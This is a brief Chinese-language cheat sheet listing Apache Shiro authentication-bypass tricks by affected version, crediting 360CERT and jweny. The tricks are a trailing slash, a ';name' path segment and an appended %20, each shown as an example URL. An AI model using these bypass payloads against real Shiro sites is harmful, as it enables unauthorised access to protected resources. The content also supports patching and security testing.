Shiro 1.3.2 Shiro < 1.5.0
/admin/1/ 即URL结尾添加反斜杠绕过权限验证
Shiro < 1.6.0
xxx.com/res/;name 当请求的资源存在时即可绕过权限验证查看资源
@三六零CERT
Apache Shiro < 1.7.1
xxx.com/admin/%20 空格绕过了权限验证
@jweny